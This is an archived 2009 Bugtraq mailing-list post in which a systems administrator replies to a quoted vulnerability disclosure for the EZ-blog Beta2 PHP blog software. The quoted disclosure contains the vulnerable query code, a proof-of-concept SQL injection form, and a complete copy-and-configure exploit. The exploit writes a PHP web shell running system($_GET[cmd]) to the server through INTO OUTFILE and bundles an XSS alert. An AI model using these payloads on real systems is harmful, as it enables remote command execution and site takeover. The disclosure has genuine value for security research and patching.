RE: SQL INJECTION (SHELL UPLOAD)--EZ-blog Beta2-->

看板Bugtraq作者時間17年前 (2009/04/29 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
This shell upload hack assumes the mySQL account running the E-Z-Blog = has file create capabilities. If an admin does NOT tweak the running = account and allows for this privilege then they are pretty much asking = for it, wouldn't you agree? ;) Aras 'Russ' Memisyazici Systems Administrator Office of Research Virginia Tech -----Original Message----- From: y3nh4ck3r@gmail.com <y3nh4ck3r@gmail.com> Sent: Monday, April 27, 2009 12:42 PM To: bugtraq@securityfocus.com <bugtraq@securityfocus.com> Subject: SQL INJECTION (SHELL UPLOAD)--EZ-blog Beta2--> ------------------------------------------------- SQL INJECTION VULNERABILITY --EZ-blog Beta2--> =20 ------------------------------------------------- CMS INFORMATION: -->WEB: http://sourceforge.net/projects/ez-blog/ -->DOWNLOAD: http://sourceforge.net/projects/ez-blog/ -->DEMO: N/A -->CATEGORY: CMS / Blogging -->DESCRIPTION: EZ-Blog is an open-source blog program written in PHP. Presently, only MySQL is supported, but a PostgreSQL version is = planned. -->RELEASED: 2009-04-26 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: N/A -->CATEGORY: SQL INJECTION (SHELL UPLOAD) -->AFFECT VERSION: <=3D1 Beta2 -->Discovered Bug date: 2009-04-26 -->Reported Bug date: 2009-04-27 -->Fixed bug date: Not fixed -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) = por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### <<<<---------++++++++++++++ Condition: magic_quotes_gpc=3Doff = +++++++++++++++++--------->>>> ------- INTRO: ------- An exploit was published by drosophila with Multiple SQL Injection in = EZ-blog Beta-1,=20 they (apparently) fixed it but the system is still vulnerable. ----------- FILE VULN: ----------- Path --> [HOME_PATH]/public/specific.php ... $whichcategory =3D Trim($_POST['category']); ... if ($whichcategory=3D=3D'All'){ $query =3D "SELECT * FROM content ORDER BY id DESC";=09 }else{ $query =3D "SELECT * FROM content WHERE topic =3D'" . $whichcategory = .. "' ORDER BY id DESC"; }=09 $result =3D mysql_query($query); ... ------------------ PROOF OF CONCEPT: ------------------ Copy and save --> PoC.html. Configure --> HOST, HOME_PATH <html> <title> PoC BY Y3NH4CK3R --PROUD TO BE SPANISH--> </title> <h1> Click "Execute PoC" to launch the proof of concept (SQLi)... </h1> <body bgcolor=3D#000000 text=3D#ffffff> <form method=3D"post" = action=3D"http:[HOST]/[HOME_PATH]/public/specific.php"> <input type=3D"hidden" name=3D"category" value=3D"-1' union all select = version(),version(),version(),version(),version(),version(),version(),ver= sion()/*"> <input name=3D"submit" value=3D"Execute PoC" type=3D"submit"> </form> <br> <br> <h2> <font color=3D#ff0000> BY y3nh4ck3r. Contact: y3nh4ck3r@gmail.com </font> </h2> </body> </html> ------------------------ EXPLOIT (SHELL UPLOAD): ------------------------ This aplication hasn't admin authentication using DB, ie, admin panel = uses .htaccess file.=20 This is a complete exploit: SQL Injection --> Shell Upload, and = XSS...all in one ;) Copy and save --> exploit.html. Configure --> HOST, HOME_PATH and COMPLETE-PATH. <html> <title> PoC BY Y3NH4CK3R --PROUD TO BE SPANISH--> </title> <h1> Click "Upload shell" to launch the exploit (SQLi)... </h1> <body bgcolor=3D#000000 text=3D#ffffff> <form method=3D"post" = action=3D"" rel="nofollow">http://[HOST]/[HOME_PATH]/public/specific.php"> <input type=3D"hidden" name=3D"category" value=3D"-1' union all select = '<HTML><title>SHELL BY --Y3NH4CK3R--></title><body text=3D#ffffff = bgcolor=3D#000000><center><h1>','YOUR SHELL IS = ON!<br></h1></center><br><br>','<font color=3D#ff0000><h2>Get var (cmd) = to execute comands. Enjoy = it!</h2></font>','<script>alert(String.fromCharCode(67,111,109,109,97,110= ,100,32,101,120,101,99,117,116,101,100,33))</script>','<h3>Command = Result:</h3>','<?php system($_GET[cmd]); ?>','<br><br><font = color=3D#ff0000><h3>By y3nh4ck3r. Contact: = y3nh4ck3r@gmail.com</h3></font></body>','</HTML>' INTO OUTFILE = '[COMPLETE-PATH]/public/shell.php'/*"> <input name=3D"submit" value=3D"Upload shell" type=3D"submit"> </form><br> <h3> Your shell in "http://[HOST]/[HOME_PATH]/public/shell.php" </h3> <br> <h2> <font color=3D#ff0000> BY y3nh4ck3r. Contact: y3nh4ck3r@gmail.com </font> </h2> </body> </html> Your shell in --> http://[HOST]/[HOME_PATH]/public/shell.php ####################################################################### ####################################################################### ##*******************************************************************## ## ESPECIAL GREETZ TO: Str0ke, JosS, drosophila ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################
更多 arasm. 的文章
文章代碼(AID): #19zqHe00 (Bugtraq)